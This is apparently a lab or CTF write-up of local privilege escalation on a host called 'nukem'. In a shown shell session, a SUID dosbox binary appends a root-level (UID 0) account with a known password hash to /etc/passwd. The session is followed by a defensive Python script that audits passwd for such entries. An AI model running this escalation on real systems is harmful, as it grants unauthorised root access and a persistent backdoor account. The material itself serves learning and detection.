dosbox
The binary, /usr/bin/dosbox, has the SUID bit set. This was later confirmed by PEAS as well.
According to GTFOBins, it can be leveraged to write arbitrary data to a file.
Issue
[http@nukem tmp]$ LFILE='/etc/passwd'
[http@nukem tmp]$ openssl passwd qwe123
5bt0JheqDrqDY
[http@nukem tmp]$ /usr/bin/dosbox -c 'mount c /' -c "echo rooted:5bt0JheqDrqDY:0:0::/root:/bin/bash >>c:$LFILE" -c exit
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/passwd
[http@nukem tmp]$ tail -n 1 /etc/passwd
rooted:5bt0JheqDrqDY:0:0::/root:/bin/bash
[http@nukem tmp]$ su rooted
Password: qwe123
Warning: your password will expire in 32510 days.
: No such file or directorybash
[http@nukem tmp]$
Writing to the /etc/passwd file was successful.
While the authentication itself appears to be working, the system failed to spawn a shell.
Found a workaround
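From the defender's side, the entry written in the session above is easy to spot in an audit of /etc/passwd. The following is an added example, not part of the original notes: the sample file contents are constructed, the function name `audit_passwd` is hypothetical, and the CRLF ending on the appended line is included because DOSBox's `echo` writes DOS-style line terminators.

```python
import re

# Constructed sample: two normal entries plus the line appended in the session
# above, with the DOS-style CRLF ending that DOSBox's echo writes.
SAMPLE_PASSWD = (
    "root:x:0:0::/root:/bin/bash\n"
    "http:x:33:33::/srv/http:/usr/bin/nologin\n"
    "rooted:5bt0JheqDrqDY:0:0::/root:/bin/bash\r\n"
)

# Password-field values that defer to /etc/shadow or lock the account.
# Assumption: an empty field (passwordless login) is reported separately.
BENIGN_PW = re.compile(r"^(x|\*|!.*)$")


def audit_passwd(text):
    """Return a list of (line_number, user, reasons) for suspicious entries."""
    findings = []
    for lineno, raw in enumerate(text.split("\n"), start=1):
        if not raw or raw.startswith("#"):
            continue
        fields = raw.split(":")
        reasons = []
        if len(fields) != 7:
            findings.append((lineno, fields[0], ["malformed: expected 7 fields"]))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            reasons.append("UID 0 account other than root")
        if pw == "":
            reasons.append("empty password field")
        elif not BENIGN_PW.match(pw):
            reasons.append("password hash stored in passwd instead of shadow")
        # Split only on "\n" above so a stray carriage return stays visible here.
        if any(ord(c) < 32 or ord(c) == 127 for c in raw):
            reasons.append("control character in entry (e.g. trailing CR)")
        if reasons:
            findings.append((lineno, user, reasons))
    return findings


if __name__ == "__main__":
    for lineno, user, reasons in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {user}: " + "; ".join(reasons))
```

When running this against a real file, read it with `open("/etc/passwd", newline="")` so Python's newline translation does not strip the carriage return before the check sees it.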